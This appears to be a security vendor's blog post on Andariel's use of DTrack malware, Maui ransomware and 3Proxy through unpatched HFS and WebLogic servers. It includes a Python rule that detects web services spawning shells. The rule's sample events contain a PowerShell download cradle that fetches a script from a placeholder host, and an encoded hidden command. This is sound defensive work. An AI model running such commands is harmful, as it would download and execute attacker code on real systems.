Our experts investigated the activity of Andariel, believed to be a subgroup of the Lazarus APT group. The cybercriminals use DTrack malware and Maui ransomware to attack businesses worldwide. As is typical for Lazarus, the group attacks for financial gain — this time through ransom demands.
Targets of Andariel attacks
Our experts concluded that, instead of focusing on any particular industry, the Andariel group is ready to attack any company. In June, the US Cybersecurity and Infrastructure Security Agency (CISA) reported that Maui ransomware targets mainly companies and government organizations in the US healthcare sector. However, our team also detected at least one attack on a housing company in Japan, as well as several victims in India, Vietnam and Russia.
The Andariel group’s primary tool is the long-established malware, DTrack. It collects information about a victim and sends it to a remote host. Among other things, DTrack collects browser history and saves it to a separate file. The variant used in Andariel attacks is able not only to send the harvested information to the cybercriminals’ server via HTTP, but to store it on a remote host in the victim’s network.
When the attackers find noteworthy data, Maui ransomware comes into play. It’s generally detected on attacked hosts 10 hours after DTrack malware activation. Our colleagues from Stairwell have studied its samples and concluded that the ransomware is controlled manually by the operators — that is, they specify which data to encrypt.
Another tool the attackers appear to be using is 3Proxy. This legitimate, free, cross-platform proxy server is likely of interest to attackers due to its compact size (only a few hundred kilobytes). This type of tool can be used to maintain remote access to a compromised computer.
How Andariel spreads its malware
The cybercriminals exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.
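Both intrusion paths described above end the same way: an internet-facing service process (an HFS file server, a WebLogic Java process) spawns a script interpreter that pulls code from a remote server. That parent/child relationship is something a defender can alert on from ordinary process-creation telemetry, independent of which exploit was used. The following detection logic is an added example written for this post, not code from Kaspersky or Securelist; the sample events, host names and the documentation-range address 203.0.113.5 are constructed, and the field names are a simplified stand-in for Sysmon Event ID 1 / EDR process-creation records.

```python
import ntpath

# Constructed sample telemetry (not taken from the original post): simplified
# process-creation events modelled on Sysmon Event ID 1 / EDR fields.
# Host names, paths and the documentation-range IP 203.0.113.5 are placeholders.
SAMPLE_EVENTS = [
    {"ts": "2022-07-01T08:12:03Z", "host": "web01",
     "parent_image": r"C:\hfs\hfs.exe", "parent_cmdline": r"C:\hfs\hfs.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/stage.ps1')\""},
    {"ts": "2022-07-01T09:40:17Z", "host": "app02",
     "parent_image": r"C:\Oracle\jdk\bin\java.exe",
     "parent_cmdline": "java -Dweblogic.Name=AdminServer weblogic.Server",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc QQBBAEEA"},
    {"ts": "2022-07-01T09:41:02Z", "host": "web02",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "parent_cmdline": "w3wp.exe -ap DefaultAppPool",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\inetpub\wwwroot"},
    {"ts": "2022-07-01T10:05:44Z", "host": "ws05",
     "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"ts": "2022-07-01T10:06:10Z", "host": "web01",
     "parent_image": r"C:\hfs\hfs.exe", "parent_cmdline": r"C:\hfs\hfs.exe",
     "image": r"C:\Windows\System32\conhost.exe", "cmdline": "conhost.exe 0x4"},
    {"ts": "2022-07-01T10:30:00Z", "host": "build03",
     "parent_image": r"C:\Program Files\Java\bin\java.exe",
     "parent_cmdline": "java -jar build-agent.jar",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c git pull"},
]

# Parent processes that serve web content and should not normally spawn shells.
WEB_SERVICE_IMAGES = {"hfs.exe", "w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe"}
# java.exe is only treated as a web service when its own command line names one,
# so build agents and other JVMs do not trigger the rule.
JAVA_WEB_MARKERS = ("weblogic", "tomcat", "jboss", "catalina")
# Script interpreters and shells whose appearance under a web service is suspicious.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Command-line fragments indicating code fetched from a remote host or obfuscated.
REMOTE_FETCH_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                        "invoke-webrequest", "invoke-expression", "iex", "-enc",
                        "frombase64string")


def parent_is_web_service(event):
    """True when the parent process is an internet-facing service."""
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent in WEB_SERVICE_IMAGES:
        return True
    if parent == "java.exe":
        parent_cmd = event.get("parent_cmdline", "").lower()
        return any(marker in parent_cmd for marker in JAVA_WEB_MARKERS)
    return False


def classify(event):
    """Return an alert dict for a web service spawning a shell, else None.

    Severity is 'high' when the child's command line also shows remote-fetch or
    encoding indicators, 'medium' for a bare shell spawn worth a closer look.
    """
    child = ntpath.basename(event["image"]).lower()
    if not parent_is_web_service(event) or child not in SHELL_IMAGES:
        return None
    cmd = event.get("cmdline", "").lower()
    indicators = [m for m in REMOTE_FETCH_MARKERS if m in cmd]
    return {
        "ts": event["ts"],
        "host": event["host"],
        "parent": ntpath.basename(event["parent_image"]),
        "child": child,
        "severity": "high" if indicators else "medium",
        "indicators": indicators,
    }


def scan(events):
    """Run the rule over a sequence of process-creation events."""
    return [alert for alert in map(classify, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']}: {alert['parent']} -> {alert['child']} "
              f"[{alert['severity']}] {alert['indicators']}")
```

On the constructed events the rule fires three times: the HFS-spawned PowerShell download cradle and the WebLogic-spawned encoded command are rated high, the IIS worker spawning a plain cmd.exe is rated medium for triage, and the administrator's PowerShell session, the console host under HFS and the build agent's JVM are left alone. The allow-listing on the java.exe command line is the part most worth tuning to your own estate: without it, every Java service that legitimately shells out would become noise.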
For a more detailed technical description of the attack and the tools involved, along with indicators of compromise, see our Securelist post.
How to stay safe?
First of all, make sure that all corporate devices, including servers, are equipped with robust security solutions. In addition, it would be wise to devise an anti-ransomware strategy and measures in advance just in case you do get infected.